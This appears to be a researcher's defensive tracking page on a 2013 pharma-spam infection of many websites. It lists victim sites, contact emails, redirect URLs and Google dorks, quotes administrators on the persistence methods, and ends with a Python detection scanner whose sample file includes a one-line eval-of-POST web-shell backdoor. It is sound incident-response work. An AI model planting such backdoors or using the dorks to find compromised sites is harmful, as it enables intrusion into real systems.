10. www.ysunews.com Youngstown State University Ohio |
chair@csis.ysu.edu ElecCompEng@ysu.edu police@ysu.edu techdesk@ysu.edu Notified 11-21-13 Still infected 11-30-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CHAQFjAIOAo&url=http%3A%2F%2Fwww.ysunews.com%2Fcanadian-viagra-prices%2F&ei=lUiNUsXXOYPDigKxvYDADQ&usg=AFQjCNEuPPaPmdqOJRXGVU4_-8smJTZ7ZA&sig2=Zp0yuDz9YDls2dlTQ2RvGA&bvm=bv.56988011,d.cGE |
11. theconservationfoundation.org Illinois |
info@theconservationfoundation.org
Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=27&ved=0CEcQFjAGOBQ&url=http%3A%2F%2Fwww.theconservationfoundation.org%2Fwhat-we-do%2Feducation.html&ei=3UqNUpzeJYaZiAKg9IDwAg&usg=AFQjCNE1-XldlYZsyNqTmeW67WAsCKxpew&sig2=dtHBJ4ShGAi9A1YbMbt5EA&bvm=bv.56988011,d.cGE |
12. naftd.org North American Fire Training Directors Washington, DC |
naftd@fsi.illinois.edu Mike.Richwine@fire.ca.gov bstevens@dhses.ny.gov billy.shelton@vdfp.virginia.gov Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=46&ved=0CFUQFjAFOCg&url=http%3A%2F%2Fwww.naftd.org%2Fsildenafil-viagra%2F&ei=lEuNUte4BIOsjALeioG4CA&usg=AFQjCNHqhIFNE9uSuPkHzsQEw0-PdwbT-A&sig2=H6O9pB1jRcR52LZ65aKUnQ&bvm=bv.56988011,d.cGE |
13. ednf.org Virginia |
ednfstaff@ednf.org Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=53&ved=0CDwQFjACODI&url=http%3A%2F%2Fwww.ednf.org%2Findex.php%3Foption%3Dcom_content%26task%3Dview%26id%3D889%26Itemid%3D88888981&ei=jUyNUv2lEOS9iwL_o4CAAQ&usg=AFQjCNFc6I50Q7wbXpDZ1680o3koEfgAVQ&sig2=OWFFlkVIuRMJF7gHU6kkFw&bvm=bv.56988011,d.cGE |
14. lyndonstate.edu Vermont |
HelpDesk@lyndonstate.edu Registrars@lyndonstate.edu George.Hacking@lyndonstate.edu Keith.Chamberlin@Lyndonstate.edu Notified 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=41&ved=0CC0QFjAAOCg&url=http%3A%2F%2Fmeteorology.lyndonstate.edu%2Fforecast%2Ftime.php%3Fodi%3Donline-canadian-viagra-sales%26on%3D1&ei=Kk6NUubIIo3piwL83YDQDQ&usg=AFQjCNFCPJjKw3fN7-anvj_iKHw6ROTEoQ&sig2=DLswaN_RBMEbi42u7IMMcg&bvm=bv.56988011,d.cGE |
15. asu.edu Arizona |
abuse@asu.edu security@asu.edu Michael.Crow@asu.edu dcst@asu.edu Notified 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CGQQFjAIOAo&url=http%3A%2F%2Farchaeology.la.asu.edu%2F_themes%2F_vti_cnf%2Flow.php%3Fp%3Dcanadian-pharmacy-free-viagra&ei=7U-NUrDiPOn5iQLGqYCoAQ&usg=AFQjCNED16sZxd4ahCjN3O2SLZoT0WSHVA&sig2=r5ioL9mE24-tMnimU8kEoQ&bvm=bv.56988011,d.cGE |
16. asea.org Alabama State Employees Association |
http://www.asea.org/?p=931 http://www.asea.org/?p=954 http://www.asea.org/?p=2074 http://www.asea.org/?p=842 http://www.asea.org/?p=321 http://www.asea.org/?p=440 | |
17. adelstjohnchurch.org.uk |
"Down for maintenance" but malware is still up | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=139&ved=0CGgQFjAIOIIB&url=http%3A%2F%2Fwww.adelstjohnchurch.org.uk%2F4.6.5%2Findex.php%2Fzyrb-viagra-online-ordering.php&ei=OFONUvySO8KciQLxgIGICw&usg=AFQjCNFkbkRRsacMYaMImbhh33lJkSEVTw&sig2=phMUywKSmMtI7v_99utLiA&bvm=bv.56988011,d.cGE |
18. tjus.org Embassy of Tajikistan to the USA |
http://www.tjus.org/component/content/article/13-slide-news/133-the-annual-message-of-the-president-of-the-republic-of-tajikistan-he-mr-emomali-rahmon-to-the-majlisi-oli-of-the-republic-of-tajikistan | |
19. un-grasp.org United Nations Great Ape Survival Project, Nairobi, Kenya |
grasp@unep.org info@bornfree.org.uk Notified on 11-25-13 |
www.un-grasp.org/?p=703 |
20. http://choctawindians.net/ Choctawhatchee High School Florida |
choctawweb@mail.okaloosa.k12.fl.us andersonk@mail.okaloosa.k12.fl.us Katherine.White@mail.okaloosa.k12.fl.us Notified on 11-25-13 |
www.choctawindians.net/brand-viagra-online-without-prescription/
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=265&ved=0CEoQFjAEOIQC&url=http%3A%2F%2Fwww.choctawindians.net%2Fbrand-viagra-online-without-prescription%2F&ei=0leNUsKnNcikiQK4qIGQBA&usg=AFQjCNEj2QGhtBnGxfleoXHHksnAeAwzFQ&sig2=AjpeEcNQJ-oe3YqedG-VYA&bvm=bv.56988011,d.cGE |
21. http://www.efig.eu.com/ UK |
info@efig.org.uk
Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=280&ved=0CHcQFjAJOI4C&url=http%3A%2F%2Fwww.efig.eu.com%2Fwhere-to-buy-viagra-in-singapore-pharmacy&ei=MlmNUs-bI-OUiALh7IDADw&usg=AFQjCNGVrrN67AujnfqqqaCmdg8B9h4ahw&sig2=qGqYrHfcXbhhAOihnFJCqw&bvm=bv.56987063,d.cGE |
22. http://nyslc.net/ New York State Lifeguard Corps |
none | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHIQFjAJ&url=http%3A%2F%2Fnyslc.net%2Findex.php%2Fwtlm-school%2520of%2520pharmacy%2520in%2520ontario%2520canada.php&ei=qVuNUqTaOKe9igKrtIDwDA&usg=AFQjCNG-PDdMqj27QB2GzE5hrn0gwp4tLg&sig2=Hkvo6PIbEVy0kr3_4z53WQ&bvm=bv.56987063,d.cGE |
23. RUTGERS.EDU New Jersey |
abuse@RUTGERS.EDU security@RUTGERS.EDU colhenry@rci.rutgers.edu james.breeding@rutgers.edu phenry@oldqueens.rutgers.edu Notified 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CFwQFjAG&url=http%3A%2F%2Fiamdn.rutgers.edu%2F~chapin%2Fwordpress%2Fwp-content%2Fplugins%2Fakismet%2F%3Fqewosoli%3DODc4%26lajywi%3Dosbon_representative_pump_erectile_dysfunction&ei=2V2NUo-EDaroiwKtzYD4Cg&usg=AFQjCNHXMIhavlNOHGML6advvKev4_eMAA&sig2=RKitik6bOVhEEnaOB4TlnQ&bvm=bv.56987063,d.cGE |
24. davisenergy.com California |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CEIQFjADOAo&url=http%3A%2F%2Fdavisenergy.com%2F%3Fp%3Duk_viagra&ei=1F6NUsHbDYidjALR04CgCg&usg=AFQjCNGJpKpwKyp8FcyREBZ_7Pkmc1o4UA&sig2=COL7028lufdKNM-1Q92EeA&bvm=bv.56987063,d.cGE | |
25. iospress.nl Multinational |
editorial@iospress.nl iospress@accucoms.com theo@vandebilt.co.uk Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CEoQFjAEOAo&url=http%3A%2F%2Fwww.iospress.nl%2Ffemale-viagra-jelly%2F&ei=1F6NUsHbDYidjALR04CgCg&usg=AFQjCNE2Mw3UMfx25HUkPpo9BER0tDPbig&sig2=66GB1Y1UBghBggU53rVI4g&bvm=bv.56987063,d.cGE |
26. ctvoterscount.org Connecticut |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFEQFjAFOAo&url=http%3A%2F%2Fwww.ctvoterscount.org%2F%3Fo%3Da1383&ei=1F6NUsHbDYidjALR04CgCg&usg=AFQjCNG73nDYuVOh706t0AtvgUR4MGiRMA&sig2=lfCRoSwak5DBJ1R_KZkhiA&bvm=bv.56987063,d.cGE | |
27. al-imanschool.org New York |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CE4QFjAD&url=http%3A%2F%2Fal-imanschool.org%2Fold%2Fhomework%2Fcheap-viagra-canadian.html&ei=nJCNUoznL8m3iwKc2IGQCA&usg=AFQjCNGqjNiTWaPPnkq-SobFhj26swhLqg&sig2=knHJ2JPW7GxtvVMXVeTC4Q&bvm=bv.56987063,d.cGE | |
28. valentinoachakdeng.org South Sudan |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0CEEQFjABOAo&url=http%3A%2F%2Fwww.valentinoachakdeng.org%2Fblog%2Ftest%2Fmarial-bai-secondary-school-summer-2011%2F&ei=iJGNUrn6FoWWiAL8w4HoCA&usg=AFQjCNGSp0KjbnCJ1dJrAhFbC-4zYBK8wg&sig2=Ga1IKFnBXkIpXo5GtEbLFw&bvm=bv.56987063,d.cGE | |
29. mlhsss.gov.gy Guyana |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&ved=0CDsQFjAAOBQ&url=http%3A%2F%2Fwww.mlhsss.gov.gy%2Findex.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D237%3Agovt-to-train-a-further-4000-early-school-leavers-in-2010%26catid%3D9%3Aindustrial-training&ei=l5KNUveuHcWviAKXiIGYAw&usg=AFQjCNEm7SOQ2W01DDi0J6MQVNLueLOO1g&sig2=AbC4eFFgzTCgIvn_iT03hA&bvm=bv.56987063,d.cGE | |
30. caterpillarsschool.com India |
info@caterpillarschoolschool.com Notified on 11-25-13 |
http://caterpillarsschool.com/catpresch/caterpiller/index.php?q=node/1028 |
31. qomchurch.org |
parishoffice@qomchurch.org Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHsQFjAJOB4&url=http%3A%2F%2Fwww.qomchurch.org%2Ffaith-formation%2Fvacation-bible-school.html&ei=zZONUsGvDMH9iwKhlYCgBg&usg=AFQjCNG-TYVhss0rzMo9rsjIPBAlmJEDgQ&sig2=HrJ5718E0uUTBABIDkIdmg&bvm=bv.56987063,d.cGE |
32. alchemytechniques.com North Carolina |
info@alchemytechniques.com Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=53&ved=0CEcQFjACODI&url=http%3A%2F%2Fwww.alchemytechniques.com%2Fhealing-school%2Fbeginning-structural-self-inquiry%2F&ei=_paNUvjMHeaxiwKzxYC4Dg&usg=AFQjCNGbhPox9rB7RqVRjRV4RcSyxj-lsw&sig2=OvpB88RHAxXTUPV-eQr5qA |
33. rabsonmanor.co.uk |
info@rabsonmanor.co.uk http://www.fifthape.co.uk/contact.php Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=58&ved=0CG4QFjAHODI&url=http%3A%2F%2Frabsonmanor.co.uk%2Fhknbcmfhypothyroidismandarrythmiachabans%2Fcullen-trinity-medical-school-st-babaramori-fratus.html&ei=_paNUvjMHeaxiwKzxYC4Dg&usg=AFQjCNGhomqReNg7bhyb-jnjGJqocK8LYw&sig2=jfNdgiLi98Jw8epjm72wjw |
34. fifthape.co.uk |
http://www.fifthape.co.uk/contact.php
Notified on 11-25-13 |
http://fifthape.co.uk/xdchrockland/patients-have-been-known-to-chew-straight-through-bwsze.html
http://fifthape.co.uk/xdchmetaclopromidejhamper/the-challenge-with-this-life-threatening-disease-systers.html http://fifthape.co.uk/xdchwheelcartsvertaalde/liposarcomas-in-this-region-as-primary-tumors-a-mesapotamia.html
|
35. lbhs.ca Lord Beaverbrook High School, Canada |
LordBeaverbrook@cbe.ab.ca BoardofTrustees@cbe.ab.ca ChiefSuperintendent@cbe.ab.ca corpsec@cbe.ab.ca Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=70&ved=0CHwQFjAJODw&url=http%3A%2F%2Fwww.lbhs.ca%2Fschool-clubs%2F&ei=eamNUr9OiISLAty6gOgF&usg=AFQjCNGu3kjLWK21kzW2Vb67M4BlRGa-2A&sig2=u0lxqihtoSB-qzOFalKJYw
|
36. damselsinsuccess.com |
php |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=85&ved=0CEkQFjAEOFA&url=http%3A%2F%2Fwww.damselsinsuccess.com%2Fwhy-some-women-are-taking-back-to-school-instead-of-work%2Fwomen-in-school-mailroom%2F&ei=AauNUsKIJKWUiAKS4YHQDA&usg=AFQjCNGDwTU64fNJbbRQtKqvl05Ws7kZqw&sig2=TyF8HZaMUE-uS_9OJQ5zkg
Uses Wordpress 3.7.1 and Plugin WP Missed Schedule 2013.1024.8888; both up-to-date. Also uses mailchimp, I cannot determine version. Uses contact-form-7; cannot determine version. Uses better-related plugin, v. 0.3.5? --current version is 0.4.3.4. Also linksalpha.com/widgets/buttons plugins for Facebook Open Graph and Google Plus. |
37. starbene.it |
php |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=91&ved=0CCsQFjAAOFo&url=http%3A%2F%2Fwww.starbene.it%2Ftag%2Fandrews-dance-school%3Fc3rhc%3D197602&ei=WquNUvHgEaf8iwKMlYHoCA&usg=AFQjCNF2mMnULd70T-lA69hjXRGuyVMqsQ&sig2=HKTFxLQ4PzqxGbmjZee2cQ
|
38. artloversnewyork.com |
nsmith0014@aol.com Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGMQFjAH&url=http%3A%2F%2Fwww.artloversnewyork.com%2Fzine%2Fcategory%2Fthe-bomb%2Fpage%2F14%2F&ei=WK2NUuCYAuSujAKs74GoCQ&usg=AFQjCNE1WXwlWnFy2vOPqz_9I2RK_N71rA&sig2=aMH7-xPXKRj0xAPWG__Kdw&bvm=bv.56987063,d.cGE
Wordpress 3.3.2 (current is 3.7.1); no apparent plug-ins |
39. auraltimes.com Blog abandoned since 2007, but still infected |
php |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0CDoQFjACOAo&url=http%3A%2F%2Fauraltimes.com%2F%3Fp%3Dbuy_viagra_online_canadian_phamacy&ei=MK-NUp-sAeHFigLexYHgAQ&usg=AFQjCNHLukHxXjdzuXervSj6Sb7Vmczotw&sig2=_ELWsjyP_JXDk_Sm05EM9w&bvm=bv.56987063,d.cGE
|
http://www.whoismind.com/whois/securedata24.com.html
I therefore suspect that this infection comes about by automated exploitation, since there is at least one site that has obviously been abandoned since 2007 that is infected. I doubt the webmaster was clicking on links this year.
I have also seen several infected sites which have had the database crash, which may be due to the infection causing collateral damage.
intitle:viagra intitle:canadian "information security"
intitle:viagra intitle:kaiser
Organization | Emails | Malicious URL |
---|---|---|
1. rip.org.uk |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CF8QFjAF&url=http%3A%2F%2Fwww.rip.org.uk%2Fyqsa-order_viagra_online_canadian_pharmacy.php&ei=PDaOUuiRGIeliQLdkoGIDg&usg=AFQjCNHR4NZhIPhK0OVaojRWpCL20e01cw&sig2=46EQSTSYMkX3xBcLJpqqDg&bvm=bv.56988011,d.cGE | |
2. cbcmagazine.com Cleveland, Ohio |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CGIQFjAFOAo&url=http%3A%2F%2Fwww.cbcmagazine.com%2Findex.php%2Ftjem-viagra_generic_paypal_discount.php&ei=eDeOUpGnJ4GwiQKvhYGgBA&usg=AFQjCNGdRhwztb_lZ-SXnRtOkrOHQdwAnQ&sig2=hi1NTXCWOrxRx5mp8YlHOA&bvm=bv.56988011,d.cGE | |
3. Turkey |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=23&ved=0CEkQFjACOBQ&url=http%3A%2F%2Fyenerveyener.com%2Findex.php%2Fdpzt-female%2520viagra%2520order%2520on%2520web.php&ei=ATiOUrGWKMOGjAKf0oHYDQ&usg=AFQjCNG3tUFfORbWJmSAfIfEbTFdNbgvHQ&sig2=fH0bEdmSCIliOPuj8BtFwA&bvm=bv.56988011,d.cGE | |
4. mcm.edu Texas |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=36&ved=0CFAQFjAFOB4&url=http%3A%2F%2Fmy.mcm.edu%2F%3FTaki%3Dcheap-viagra-uk-paypal-drug&ei=ejiOUvmWMquZjALrmIHgBw&usg=AFQjCNFx5kXmNFD27aHEvZ8IdqL0cEkXOg&sig2=zuc5Zlakv5l8ZKpE9jfEMg&bvm=bv.56988011,d.cGE | |
5. procue.info Spain |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGYQFjAIOB4&url=http%3A%2F%2Fwww.procue.info%2Flqks-viagra%2520online%2520canadian%2520pharmacy%2520paypal%2520tablets.php&ei=ejiOUvmWMquZjALrmIHgBw&usg=AFQjCNHJ7hxjmOscuDIMFxwi41URdQXt4Q&sig2=bEPeCwyGfW1Vz4TcV0dMhA&bvm=bv.56988011,d.cGE | |
6. grw.co.nz |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=63&ved=0CD4QFjACODw&url=http%3A%2F%2Fwww.grw.co.nz%2Findex.php%2Fohav-how%2520to%2520get%2520viagra%2520over%2520the%2520counter.php&ei=NDqOUsK_JMvriQLwiYDABQ&usg=AFQjCNF-x9aHVnFahOnHE8M359njMgSFuw&sig2=_v2H5RRDYJQ4Sh5sMMAKZw&bvm=bv.56988011,d.cGE | |
7. virginia.edu Virginia |
abuse@virginia.edu security@virginia.edu compe@virginia.edu lowe@virginia.edu patricia@virginia.edu Notified 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CIABEBYwCA&url=http%3A%2F%2Fwww.career.virginia.edu%2Ffeeds_old%2Fplaylister%2F%3Fall%3Dviagra-kaiser%26is%3D1&ei=Bz-OUtaVIsaIiAK7roGADQ&usg=AFQjCNGSEjjrariwmaty0iuau_KguJ0pOA&sig2=T9C5pTLrj-PdnkNKRvMvpg&bvm=bv.56988011,d.cGE |
8. udg.edu Spain |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=99&ved=0CGcQFjAIOFo&url=http%3A%2F%2Flequia.udg.edu%2Fold%2Fthickbox%2F%3Frai%3Dkaiser-viagra%26cd%3D2&ei=1kKOUu6ODuOUiAKA1ID4Cw&usg=AFQjCNEfX3T-vDdXde0a4gz-pTJihmG3SQ&sig2=_fXXIY8W0aBSzf0GxyeLMg |
Thanks, Jared!
Thank you for your write up on KWC's site infection. We've been working to eradicate the virus, and think we've removed it now. We've been able to temporarily remove it in the past, but it reestablished itself. It also changed in the way it worked after we removed it once, which made it harder to track down. Originally it was using the htaccess file to rewrite browser details to Google and Yahoo, but then it switched to prepend a php file to every page using the php.ini file. There were several other access points they had created using php's eval command to post code to our server. We've, of course, removed those now and taken other preventative steps in the hope that it is gone for good now.
Your write up was very helpful, though, and I'm sharing this with you in the hope that it will help the other sites you've discovered to contain the same issue.
Jared Ehrenheim for KWC.edu
I checked the first ten hits with this search, and they are no longer infected. Looks like KWC has it fixed!
inurl:kwc.edu viagra
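The three persistence mechanisms named in the message above (a cloaking .htaccess, a php.ini prepend, and eval-based PHP access points) can be swept for on a web root. The following is an added example, not code from KWC or from this write-up; the rule names, sample files and paths are constructed assumptions, and every hit is a lead for manual review, not a verdict.

```python
import os
import re
import tempfile

# RewriteCond that branches on the visitor's User-Agent or Referer and names a
# search engine: the .htaccess cloaking stage described in the message.
HTACCESS_CLOAK = re.compile(
    r"^\s*RewriteCond\s+%\{HTTP_(USER_AGENT|REFERER)\}\s+.*(google|yahoo|bing|bot)",
    re.IGNORECASE,
)
# auto_prepend_file with a value, in php.ini/.user.ini ("key = value") or in
# .htaccess ("php_value key value"). Commented-out and empty settings do not match.
AUTO_PREPEND = re.compile(
    r"^\s*(?:php_value\s+)?auto_prepend_file[\s=]+[\"']?([^\s\"';=]+)",
    re.IGNORECASE,
)
# eval() fed straight from request data, optionally through a decoder.
EVAL_REQUEST = re.compile(
    r"\beval\s*\(\s*(?:(?:base64_decode|gzinflate|str_rot13|stripslashes)\s*\(\s*)*"
    r"\$_(POST|REQUEST|GET|COOKIE)\b",
    re.IGNORECASE,
)


def rules_for(filename):
    """Pick the rules that apply to a file, based on its name."""
    lower = filename.lower()
    if lower == ".htaccess":
        return [("htaccess-cloaking", HTACCESS_CLOAK), ("auto-prepend", AUTO_PREPEND)]
    if lower in ("php.ini", ".user.ini"):
        return [("auto-prepend", AUTO_PREPEND)]
    if lower.endswith((".php", ".phtml", ".inc")):
        return [("eval-of-request-data", EVAL_REQUEST)]
    return []


def scan_tree(root):
    """Return sorted (relative path, line number, rule) tuples for a web root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            rules = rules_for(name)
            if not rules:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    lines = fh.read().splitlines()
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            for lineno, line in enumerate(lines, 1):
                for rule, rx in rules:
                    match = rx.search(line)
                    if not match:
                        continue
                    # "none" is PHP's way of disabling the prepend
                    if rule == "auto-prepend" and match.group(1).lower() == "none":
                        continue
                    findings.append((rel, lineno, rule))
    return sorted(findings)


# Constructed sample web root (not taken from any real server).
SAMPLE_FILES = {
    ".htaccess": (
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_REFERER} (google|yahoo) [NC,OR]\n"
        "RewriteCond %{HTTP_USER_AGENT} (googlebot|slurp) [NC]\n"
        "RewriteRule ^(.*)$ /placeholder.php [L]\n"
    ),
    "php.ini": (
        "; constructed sample\n"
        "memory_limit = 128M\n"
        "auto_prepend_file = /var/www/html/images/.cache.php\n"
    ),
    "docs/.user.ini": "auto_prepend_file =\n",          # empty default: clean
    "index.php": "<?php echo 'hello'; ?>\n",            # clean page
    "uploads/post.php": "<?php eval(base64_decode($_POST['c'])); ?>\n",
}


def scan_constructed_sample():
    """Write SAMPLE_FILES to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, lineno, rule in scan_constructed_sample():
        print(f"{rel}:{lineno}: {rule}")
```

A legitimate bot-blocking RewriteCond or a deliberate prepend will also match, so compare hits against a known-good copy of the site before removing anything.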
Thanks, Don!
I think your use of Google Dorks is useful, but not definitive. We used to rely heavily on Google Dorks and Google Alerts to keep an eye out for activity like this, but those tools have become increasingly unreliable over the last few years. As a case in point, using the search you offer as an example (modified to single us out):
inurl:uark.edu viagra-online-100mg
We were at first unable to locate any record of defacement (including the site you reported). We later located the following URL (still no sign of your reported site):
www.uark.edu/misc/space/viagra/?id=Buy-Viagra-online-100mg
However, that particular site has been off-line for some time, so any attack would be quite old. Today, the Google search again returns no results.
Another interesting point is that our hacked site did not use securedata24.com for redirect. Instead, it uses keycollector.pw, which was registered on 20 April, near the same time as securedata24.
Again, thank you for taking the time to alert us.
From Don Faulkner
I tested the first ten hits for this dork on 11-21-13, and they were all clean. So I think they got it cleaned off!
inurl:uark.edu viagra
From Don Faulkner, UARK.EDU:
We saw no evidence of remote control or botnet-like behavior. The affected site did not house sensitive data.
From Jared Ehrenheim, KWC.EDU:
I've also discovered POST requests to one of the infected PHP files coming from two different Netherlands registered IP addresses: 46.249.58.18 and 95.211.111.78. I've blacklisted those, but I anticipate there are more.
46.249.58.18 is marked as a spam source by Spamhaus:
http://www.mywot.com/en/scorecard/46.249.58.18
I can't find any reports of malicious activity from 95.211.111.78.
What we really could use now is a sample of the malware. PCAP files of the traffic would be good too. If anyone at infected colleges can help, please email me: sbowne@ccsf.edu
I used these Google searches:
"viagra online 100mg" san francisco california
viagra Canadian san francisco california
san francisco intitle:viagra
Organization | Emails | Malicious URL |
---|---|---|
1. 12ozprophet.com NYC, I think |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CG4QFjAG&url=http%3A%2F%2Fwww.12ozprophet.com%2Fnews%2Fphotos_nyc_2nd_avenue_subway_construction%3Fmtjve%3D350000&ei=IDCQUsaIBc_3oASx2oHADw&usg=AFQjCNFQC18xz-rFE-3ZMXb423dWuEMJ_w&sig2=v2Q9ISoppnLGAMODwNdFtA&bvm=bv.56988011,d.cGU | |
2. http://www.ediblecommunities.com/ They have an office in San Francisco |
ediblesanfrancisco@gmail.com Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CFsQFjAGOAo&url=http%3A%2F%2Fwww.ediblecommunities.com%2Fcontent%2Fedible-stories.htm%3Fm%3D201008%26zwrpy%3D664050&ei=5TGQUrjkL9XroATKpIII&usg=AFQjCNF4qEKLcWjuDwsL3S4RfqAwWpkDIw&sig2=LU6d4sozjgv2fOVunTCOYQ&bvm=bv.56988011,d.cGU |
3. californiarowingclub.com Oakland |
Page is infected with JS.HideMe-J [Trj] | http://www.californiarowingclub.com/index.php/programs |
4. hpfirefighter.com North Carolina |
http://hpfirefighter.com/2013/08/video-sheds-light-on-flight-214-passengers-death/ | |
5. merolaopera.com |
Merola Opera Program War Memorial Opera House 301 Van Ness Avenue San Francisco, CA 94102-4509 USA Phone: 1.415.565.6427 Fax: 1.415.565.3254 Email: mop (at) sfopera.com Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CFMQFjAF&url=http%3A%2F%2Fmerolaopera.com%2Fstaff&ei=ejeQUq4q2OagBMGggqAG&usg=AFQjCNGhq8bXPIE0WA33s9k0Yb0pDMcMsg&sig2=WH0dfbpc94wNCNx5Oj6VvA |
6. lautze.com |
San Francisco Office (Main Office) 303 Second Street, Suite #950 San Francisco CA 94107 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGIQFjAH&url=http%3A%2F%2Fwww.lautze.com%2Flinks.html&ei=ejeQUq4q2OagBMGggqAG&usg=AFQjCNH44eFZ5TccxVHVJ4yumgzeIwwFYA&sig2=E8f2Qz8zEhw4ocV2wZGu0w |
7. webchaver.org NJ; a browser security product |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=25&ved=0CEcQFjAEOBQ&url=http%3A%2F%2Fwebchaver.org%2Fcanadian-online-pharmacy-viagra-no-prescription%2F&ei=YjmQUsCPNZDUoATB-4LQAQ&usg=AFQjCNHk15_HlSxWBiWdQ1zAINxAv4gWEg&sig2=uFh6AX5-yil6xvFuvye8nA | |
8. advancedhomeenergy.com |
1356 S 50th St, Richmond, CA 94804 Ph: (510) 540-4860 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=29&ved=0CGYQFjAIOBQ&url=http%3A%2F%2Fwww.advancedhomeenergy.com%2Fhome&ei=YjmQUsCPNZDUoATB-4LQAQ&usg=AFQjCNHSO_MyJPjunQLz5sL9xcRWJL7U6Q&sig2=PwtC-mHr9KwnoQPBnGI9Tg |
9. mixeddimensions.com |
181 Fremont st., San Francisco, CA 94105 info@mixeddimensions.net Notified 11-25-13 |
mixeddimensions.com/?xb=594 Not the same infection, hosted locally |
10. ismrm.org |
International Society for Magnetic Resonance in Medicine 2030 Addison Street, 7th Floor Berkeley, CA 94704 USA Tel: +1 510-841-1899 Fax: +1 510-841-2340 info@ismrm.org Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHEQFjAJOB4&url=http%3A%2F%2Fwww.ismrm.org%2F13%2Ftp09.htm&ei=0TqQUpWLJczZoASLvoDIAw&usg=AFQjCNH3Mebg6q2RERfICm_v4cLaKXas9g&sig2=fDjkigFKsFZgTbut9vp4ng |
11. pinkberry.com |
3130 Wilshire Blvd, 4th Floor, Santa Monica, CA 90403 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=45&ved=0CEkQFjAEOCg&url=https%3A%2F%2Fwww.pinkberry.com%2Ffrozen-yogurt-store%2Fus%2Fca%2Flos-angeles%2F92%2Flax%3Fcglua%3D640342&ei=xjyQUuDDMNjmoATBoIKgBg&usg=AFQjCNGKOgdOmrs-gqHEkUSB-P_K5NSnAg&sig2=E9GC65JDjCFmxyPRgGsNFw |
12. enterprisecontinuity.com A cybersecurity company |
DISASTER RESOURCE GUIDE | PO Box 15243, Santa Ana, CA 92735 | TEL 714.558.8940 | FAX 714.558.8901 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=115&ved=0CEYQFjAEOG4&url=http%3A%2F%2Fwww.enterprisecontinuity.com%2F%3Fceisprernte279%3Dcanadian-pharmacy-viagra-100mg&ei=pj-QUvL7IsPzoATbxIDoAw&usg=AFQjCNGQ5CC0HXNIc6q7fS0cWOpd0nE9Cg&sig2=pmBWVzx3V-qzdleRDGMLqA |
13. metrostudy.com Washington, DC |
